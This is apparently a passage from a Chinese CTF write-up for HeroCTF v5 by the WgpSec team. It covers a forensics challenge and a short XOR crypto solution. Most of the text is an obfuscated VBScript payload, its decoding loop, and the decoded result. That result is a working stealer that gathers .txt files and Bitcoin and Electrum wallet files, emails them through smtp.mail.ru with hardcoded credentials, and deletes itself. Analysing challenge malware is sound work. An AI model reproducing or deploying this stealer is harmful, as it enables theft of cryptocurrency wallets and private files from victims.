428*-5919+5989*1090686/9826*2425-2317*6336-6236*1813-1712*-2191+2305*9652-9537*9625-9585*-3729+3797*-4549+4650*985090/8566*-8777+8884*5375-5259*-6471+6582*-8453+8565*294503/7183*-4769+4810*-2258+2268*215040/3072*-6029+6140*5620-5506*-3090+3122*-9147+9248*-264+361*887238/8962*281320/2705*51744/1617*4575-4473*-4156+4261*9331-9223*951-850*-1848+1880*1910-1805*-9310+9420*-216+248*-2789+2891*536004/4963*3133-3033*-9428+9474*890358/8729*-4565+4670*609876/5647*205636/2036*-2583+2698*4720-4710*133888/4184*276512/8641*-6207+6239*253472/7921*574455/5471*-2700+2802*7355-7323*10029-9953*6362-6295*753205/7765*1059-944*-7168+7269*87480/2187*435680/6224*-8004+8087*642507/8133*199916/4346*3756-3685*-9766+9867*-9135+9251*8993-8924*-3176+3296*-8575+8691*291183/2883*7747-7637*7180-7065*8191-8086*-818+929*8775-8665*393588/5046*-3295+3392*867422/7958*375619/3719*6420-6380*162894/1597*206-101*-304+412*618120/6120*350345/8545*810-769*4740-4708*123281/2021*622-590*1605-1571*8091-7975*-4838+4958*548912/4732*253368/7452*16608/519*-1605+1689*383552/3688*417130/4130*53790/489*99290/9929*-9918+9950*-9227+9259*168000/5250*4322-4290*2527-2495*7500-7468*3790-3758*99424/3107*388395/3699*-7248+7325*1041095/9053*1007134/9778*6547-6501*-5928+5993*797-697*119800/1198*282685/4349*-9111+9227*-9411+9527*3902-3805*920-821*7394-7290*832869/7641*754470/7470*1048630/9533*271788/2343*8755-8723*628932/6166*-8609+8714*1572-1464*743158/7358*438334/9529*231168/2064*3693-3596*728596/6281*-2682+2786*-9926+9936*-9748+9757*-272+282*300576/9393*30240/945*290656/9083*119872/3746*5377-5308*4393-4283*460800/4608*286368/8949*-8409+8514*425136/4168*-5925+5935*2237-2159*-3814+3915*-972+1092*675236/5821*-3495+3505*1203-1193*-149+159*7720/772*42720/4272*25000/2500*49710/4971*2677-2667*8137-8067*1386-1278*-8687+8787*2967-2852*86526/1881*325-240*-7839+7951*653500/6535*252103/2599*-3329+3445*780528/7728*70240/2195*3535-3525*-7454+7559*-8043+8120*7121-7006*441973/4291*282210/6135*326357/4871*191031/1721*63910/581*-9597+9699*8957-8852*-9229+9332*-8567+8684*673626/5909*8054-7957*854688/7368*-174+279*7668-7557*186670/1697*9072-9011*723-618*-5322+5389*9839-9728*85250/775*5201-5099*129536/4048*7700-7690*-3280+3385*-1050+1127*883660/7684*3005-2902*-614+660*724-640*747585/6735*-1825+1886*601-486*154976/1336*295944/2596*-7415+7499*-296+407*7019-6987*-1505+1515*-7386+7396*-5577+5682*-6894+6971*1129875/9825*1979-1876*300978/6543*1159-1089*-1196+1310*-6063+6174*4369-4260*548878/8998*5217-5102*6188-6072*-6988+7102*-3098+3168*-5136+5250*-4484+4595*-2995+3104*304768/9524*-2425+2435*47775/455*303303/3939*245-130*117729/1143*120888/2628*-3451+3534*4358-4241*58310/595*221010/2085*933240/9240*-4930+5029*135256/1166*268217/4397*685-570*5034-4918*-4379+4493*2023-1940*117000/1000*3630-3532*6056-5950*9975-9874*-3624+3723*4562-4446*7735-7703*76690/7669*546525/5205*4010-3933*2504-2389*3246-3143*7076-7030*-6562+6646*4550-4449*471240/3927*9673-9557*1588-1522*95127/857*-6941+7041*470327/3887*295850/4850*36225/315*8971-8855*-8424+8538*464640/7040*3464-3353*185100/1851*-2651+2772*46016/1438*-3547+3557*4513-4503*-9514+9597*5023-4922*640900/5525*5138-5106*603738/5919*1030428/9541*-4290+4390*-5461+5493*90524/1484*829-797*414190/5917*-5686+5769*275078/3482*292652/6362*-4110+4181*410868/4068*221212/1907*67480/964*-3242+3353*-7083+7191*6812-6712*960611/9511*323076/2834*248960/6224*4167-4084*107042/2327*6174-6091*1212-1100*707606/7006*-1084+1183*4976-4871*358415/3695*637740/5905*190470/2721*-1543+1654*-1862+1970*-3759+3859*5582-5481*342456/3004*-5943+6058*-5510+5550*-7169+7246*3483-3362*650488/9566*10043-9932*96129/971*-2968+3085*9843-9734*868903/8603*-6078+6188*-2601+2717*-934+1049*101270/2470*-9207+9248*6470/647*111720/1596*-9503+9614*8631-8517*174016/5438*-7741+7842*-1537+1634*75141/759*-8864+8968*7224-7192*1864-1762*706335/6727*996408/9226*68781/681*-4139+4171*-7076+7181*362230/3293*798-766*62424/612*917460/8495*1563-1463*-586+632*25194/247*-2393+2498*9667-9559*662257/6557*-7712+7827*66670/6667*188192/5881*-3989+4021*-2632+2664*17088/534*-5111+5216*7033-6931*-4333+4365*-2608+2684*101103/1509*779201/8033*-5186+5301*-4177+4278*218960/5474*321580/4594*228914/2758*75287/953*5750-5704*269729/3799*817393/8093*307052/2647*1608-1539*1198920/9991*746112/6432*475811/4711*-3264+3374*133055/1157*121695/1159*80253/723*-1313+1423*726648/9316*-164+261*1000184/9176*980306/9706*-7436+7476*7009-6907*-2940+3045*2112-2004*969-868*83148/2028*7489-7448*7233-7201*-3901+3962*5825-5793*1016-982*-5260+5376*2840-2720*7057-6941*33252/978*5895-5863*-7377+7461*408304/3926*3085-2984*95150/865*15310/1531*237216/7413*199168/6224*262976/8218*42368/1324*-3165+3197*194112/6066*135872/4246*-3628+3660*1781-1676*6531-6454*435965/3791*6709-6606*2855-2809*5445-5380*9213-9113*1875-1775*455845/7013*4494-4378*892620/7695*2937-2840*1663-1564*-1178+1282*277-168*8021-7920*-9775+9885*-8153+8269*-1235+1267*-4807+4909*344505/3281*762156/7057*737502/7302*212796/4626*959952/8571*1289-1192*203812/1757*27040/260*-4351+4361*1190-1181*-727+737*-9461+9493*1074-1042*172736/5398*-2363+2395*-5745+5814*-6194+6304*8164-8064*-9730+9762*199710/1902*661980/6490*75970/7597*8434-8356*4926-4825*9359-9239*-8777+8893*6327-6317*103740/988*-5020+5097*-8759+8874*12154/118*-8541+8587*-3330+3395*593200/5932*-5350+5450*2882-2817*7215-7099*-4273+4389*-7068+7165*9653-9554*7817-7713*872327/8003*885770/8770*3196-3086*-1464+1580*-3852+3884*-4662+4696*3410-3343*253866/4377*-6947+7039*9904-9819*-8805+8920*8993-8892*1075134/9431*811095/7053*-4152+4244*333234/9801*43328/1354*8436-8398*1879-1847*467705/4067*168432/1452*-273+387*4309-4224*-5712+5827*799920/7920*-7286+7400*4906-4828*-4459+4556*-5105+5214*-259+360*135968/4249*78014/2053*6954-6922*-113+147*-3438+3530*-179+244*9495-9383*174384/1557*5900-5832*410892/4236*9635-9519*-2614+2711*8039-7947*488680/6430*-7377+7488*943668/9532*-3692+3789*8701-8593*813924/8847*5018-4907*4281-4181*-7773+7878*7365-7255*220064/2392*-6479+6590*-5066+5166*-9829+9934*5029-4919*-4921+5035*1568-1467*-9208+9320*192696/1736*-5773+5887*523392/4512*7797-7751*-2309+2431*1287-1182*-5454+5566*928-894*-8093+8103*-4668+4773*444059/5767*88320/768*396-293*-3084+3130*-1038+1103*6066-5966*300200/3002*-970+1035*856776/7386*-2832+2948*438440/4520*5417-5318*-8435+8539*-4772+4881*682760/6760*-7527+7637*1087384/9374*-8470+8502*157862/4643*1277-1212*-4163+4221*188692/2051*1823-1738*1869-1754*-1411+1512*5012-4898*-7083+7198*-5155+5247*235586/6929*-6662+6694*3751-3713*-2175+2207*-4217+4332*2681-2565*708510/6215*-6055+6140*2065-1950*2006-1905*4564-4450*6982-6904*180614/1862*1407-1298*9041-8940*246976/7718*8106-8068*-2269+2301*202776/5964*882096/9588*10855/167*6256-6144*8971-8859*8064-7996*26869/277*-9849+9965*827992/8536*-3688+3780*-9237+9313*2421-2310*-8325+8424*618278/6374*-982+1090*-4424+4516*1027860/9260*4753-4653*671895/6399*431750/3925*575644/6257*9534-9423*493400/4934*1743-1638*-9006+9116*183540/1610*995153/9853*2654-2542*228660/2060*9820-9706*917792/7912*-9046+9092*-7454+7576*832020/7924*-1537+1649*7691-7657*5204-5194*3741-3636*-4441+4518*-9252+9367*7615-7512*6959-6913*510835/7859*351200/3512*-5573+5673*-1425+1490*45820/395*589-473*479471/4943*-7174+7273*395928/3807*34335/315*78174/774*-6307+6417*131776/1136*1615-1583*66844/1966*-6198+6264*-6334+6392*-6898+6990*786420/9252*9990-9875*714171/7071*-9011+9125*-1109+1224*6651-6559*6648-6614*5112-5080*362748/9546*-1271+1303*-4318+4433*929972/8017*1906-1792*517480/6088*-3890+4005*556409/5509*832428/7302*124800/1600*247253/2549*647787/5943*398243/3943*195872/6121*3984-3946*4956-4924*-6388+6422*-4733+4825*523185/8049*587440/5245*193648/1729*-7312+7380*438731/4523*410988/3543*-2965+3062*824596/8963*-6643+6719*2960-2849*-4728+4827*7681-7584*-7197+7305*-2471+2563*6958-6847*-593+693*-39+144*537790/4889*17020/185*36519/329*-7189+7289*931665/8873*-7248+7358*9013-8899*-7595+7696*397152/3546*-5882+5993*7728-7614*1020452/8797*-4845+4891*-7532+7654*3369-3264*-4572+4684*311202/9153*-3565+3575*1025325/9765*-3536+3613*5977-5862*-2920+3023*442934/9629*6907-6842*153100/1531*-8662+8762*75660/1164*9114-8998*450196/3881*-8389+8486*-8357+8456*2757-2653*236530/2170*121402/1202*-2528+2638*230608/1988*-6468+6500*55488/1632*-5636+5704*-7693+7751*-3748+3840*275910/3246*9002-8887*220887/2187*7609-7495*5450-5335*22540/245*4167-4133*-2319+2351*-4913+4951*41888/1309*6132-6017*862692/7437*97584/856*-7036+7121*-165+280*4317-4216*9853-9739*3165-3087*9460-9363*1967-1858*1971-1870*-9821+9853*-731+769*310-278*260100/7650*9149-9057*316225/4865*803824/7177*887152/7921*-901+969*107573/1109*86884/749*8651-8554*8501-8409*6706-6630*6433-6322*390555/3945*5810-5713*4162-4054*-1967+2059*1051725/9475*653700/6537*308-203*763510/6941*3556-3464*576312/5192*905500/9055*-6307+6412*952490/8659*665760/5840*997678/9878*-8980+9092*-3645+3756*7518-7404*3835-3719*291318/6333*-4226+4348*991200/9440*261296/2333*1768-1734*9002-8992*431655/4111*-3533+3610*-4070+4185*5303-5200*230414/5009*-4638+4703*-1871+1971*544700/5447*9765-9700*-5390+5506*-8226+8342*222227/2291*8208-8109*-4446+4550*8109-8000*5536-5435*255420/2322*2899-2783*8627-8595*27506/809*6130-6063*248182/4279*817052/8881*229-144*-8947+9062*688012/6812*817152/7168*981065/8531*849620/9235*196316/5774*27808/869*-3958+3996*60256/1883*7442-7327*121684/1049*502284/4406*793390/9334*-5531+5646*-2111+2212*614802/5393*4013-3935*-9320+9417*1014899/9311*6851-6750*251680/7865*-7710+7748*8283-8251*-7814+7848*-3575+3667*120315/1851*-1558+1670*-5154+5266*6372-6304*4909-4812*763396/6581*8700-8603*8485-8393*4779-4697*964590/8690*4356-4259*369510/3390*-9809+9914*-1525+1635*-9541+9644*133952/1456*-7503+7569*151095/1439*5249-5133*-2331+2430*824508/7428*-1644+1749*303380/2758*4615-4523*-7270+7389*-6492+6589*965628/8941*518724/4803*-5457+5558*-1333+1449*-8773+8819*-9847+9947*1214-1117*-2694+2810*6286-6252*-6111+6121*540855/5151*9808-9731*2233-2118*-2649+2752*134458/2923*386815/5951*-8893+8993*944800/9448*266175/4095*2059-1943*7522-7406*2283-2186*94446/954*9404-9300*-5548+5657*-1651+1752*-4195+4305*2909-2793*169536/5298*-7616+7650*8017-7950*-6255+6313*9486-9394*386070/4542*-7451+7566*779922/7722*9677-9563*389505/3387*-6200+6292*-8178+8212*51392/1606*328624/8648*5048-5016*-1241+1356*-785+901*1010610/8865*-6808+6893*9248-9133*9902-9801*930126/8159*3696-3618*-2332+2429*-3235+3344*-1652+1753*1599-1567*79344/2088*-1113+1145*-6125+6159*5755-5663*4512-4447*409808/3659*846272/7556*-158+226*764457/7881*98948/853*-5215+5312*6171-6079*2397-2315*1088355/9805*-5304+5401*-2078+2187*64365/613*5301-5191*8074-7971*59064/642*147522/2138*1409-1301*9335-9234*374814/3786*4344-4228*5854-5740*2838-2721*-4566+4675*563040/6120*8428-8309*826828/8524*-6258+6366*-1624+1732*3979-3878*-4184+4300*2047-1932*-5648+5740*8190-8090*820322/8122*4850-4748*-6814+6911*3196-3079*-676+784*-8483+8599*500555/5269*-5567+5686*7448-7351*-9488+9596*-2319+2427*8614-8513*875568/7548*8759-8725*94110/9411*4020-3915*-1870+1947*5059-4944*-3964+4067*445648/9688*307847/3709*297445/2945*8544-8434*370300/3703*78830/7883*4949-4939*87930/8793*-4282+4292*557760/6720*972933/9633*6306-6190*3174-3142*-3321+3430*668430/9549*-1832+1915*7360-7281*6648-6616*518012/8492*5290-5258*8085-8018*-558+672*-1896+1997*-4519+4616*-5924+6040*539-438*-5251+5330*475594/4853*-3759+3865*937-836*194139/1961*647512/5582*-4260+4300*5363-5329*7619-7536*556380/5620*361494/3171*-2638+2743*7771-7659*-1302+1418*754530/7186*18700/170*6977-6874*-6256+6302*169330/2419*448035/4267*280152/2594*67569/669*262363/3161*1129172/9332*9561-9446*369808/3188*3666-3565*780876/7164*-2894+2973*4633-4535*883192/8332*-9212+9313*-6690+6789*6703-6587*2591-2557*-9564+9605*2434-2424*-8734+8744*-391+458*-3764+3861*999540/9255*9542-9434*6111-6079*9717-9608*8366-8296*414917/4999*-3749+3828*136022/2957*188972/2779*743158/7358*7297-7189*110898/1098*-5193+5309*672761/6661*-7908+7978*682605/6501*-1173+1281*6223-6122*8607-8567*6991-6904*1656-1573*-118+217*7148-7034*-857+962*-4816+4928*-8297+8413*-6621+6667*-3618+3701*7964-7865*160056/1404*-2953+3058*4898-4786*534412/4607*-6243+6313*-8490+8607*171828/1591*1350-1242*87360/1120*-9362+9459*-8716+8825*2299-2198*-5581+5625*7758-7726*-2470+2554*-6374+6488*-1107+1224*-5495+5596*2065-2024"
axEjahGoVVhnxPRQQDPPaiTXLQhUIRhouDwwHvOyp = splIt(jjkMPKzNVhSgpGmvLdVBVGOimrerTQIaeDiocFNQY, chr(eVaL(75684/1802)))
for each MqNbrDAQjYRIwUnepBXnOsmlQlLuaaeTTwAchSFjz In AxEjahGovVHNxprqQdPPAITXLqhuiRHOuDwwhVOyP
FWwCltIiEsLkZgGUCRjiAEuTJbMpVVgZwJNhOLFSp = fwWCLtIieslKZgGUcrjIaEUTJBmPvvgZwjNHoLfSp & Chr(eVaL(MqnBrdaqjYRIwUnEPBxnoSMlqLluAaeTtwAchSFJz))
NEXT
lxtvaQuFKFKhmxjWgYFOSFuWJcYbTRdpUPuDAdnmD
end SUb
SUb LXTvAQufKFkHMxJwGYFOsFUwJcYBTRDPuPUdadnmD
eval(eXecUTe(fwwCltiieslkzggUCrJIaeUtjBmPvvGZwJNHoLFsp))
enD sUB
FnCtqZiRWLtyCeayCzQdIrDKqrIZAkwRIzBsCpRXs
其实就是把那个很长的公式按 * 分割,然后计算结果转为chr
on error resume next
Const Desktop = 4
Const MyDocuments = 16
Set S = CreateObject("Wscript.Shell")
Set FSO = CreateObject("scripting.filesystemobject")
WScript.Sleep(1000 * 30)
strSMTP_Server = "smtp.mail.ru"
strTo = "[email protected]"
strFrom = "[email protected]"
strSubject = "AIRDROP"
strBody = "LOG"
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set wshShell = CreateObject( "WScript.Shell" )
strUserName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = true
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "R4CMZ3rVnMFtzz6vzRi1"
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
Set fld = FSO.GetFolder(S.SpecialFolders(Desktop))
For each file in fld.files
if LCase(FSO.GetExtensionName(file)) = "txt" Then
iMsg.AddAttachment file.path
End if
Next
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
Set fld = FSO.GetFolder(S.SpecialFolders(MyDocuments))
For each file in fld.files
if LCase(FSO.GetExtensionName(file)) = "txt" Then
iMsg.AddAttachment file.path
End if
Next
iMsg.AddAttachment "C:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "A:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "B:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "D:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "C:Users" & strUserName & "AppDataRoamingBitcoinwallet.dat"
iMsg.AddAttachment "C:Users" & strUserName & "AppDataRoamingElectrumwalletsdefault_wallet"
iMsg.Send
Set mFSO = CreateObject("Scripting.FileSystemObject")
Call mFSO.DeleteFile(WScript.ScriptFullName, True)
邮箱是 [email protected] 文件是 default_wallet
Crypto
Hyper Loop
题目
题解
简单的异或直接可以根据flag格式还原key
from os import urandom
flag =b'x05px07MSxfd4eFPwxf9}%x05x03x19xe8'
flags=b'Hero{'
key=[]
for i in range(len(flags)):
key.append(flags[i]^flag[i])
key.append(ord('}')^flag[-1])
a=''
key=key*3
for j in range(len(flag)):
a+=chr(flag[j]^key[j])
print(a)
#Hero{hyp3r_l00p!1}
作者
CTF战队
ctf.wgpsec.org
扫描关注公众号回复加群
和师傅们一起讨论研究~
长
按
关
注
WgpSec狼组安全团队
微信号:wgpsec
Twitter:@wgpsec
原文始发于微信公众号(WgpSec狼组安全团队):HeroCTF v5 题解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论